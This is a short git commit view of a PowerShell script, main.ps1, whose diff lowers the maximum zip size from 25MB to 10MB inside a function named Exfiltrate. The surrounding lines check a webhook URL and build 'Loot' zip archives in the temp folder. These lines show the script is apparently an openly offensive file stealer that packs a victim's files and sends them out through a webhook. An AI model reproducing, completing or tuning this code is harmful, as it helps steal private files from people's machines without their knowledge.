Update main.ps1

This commit is contained in:
egieb
2025-06-17 12:11:05 +00:00
committed by GitHub
parent 668346702a
commit 85127f9841

View File

@@ -7,7 +7,7 @@ if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookur
Function Exfiltrate {
param ([string[]]$FileType,[string[]]$Path)
$maxZipFileSize = 25MB
$maxZipFileSize = 10MB
$currentZipSize = 0
$index = 1
$zipFilePath ="$env:temp/Loot$index.zip"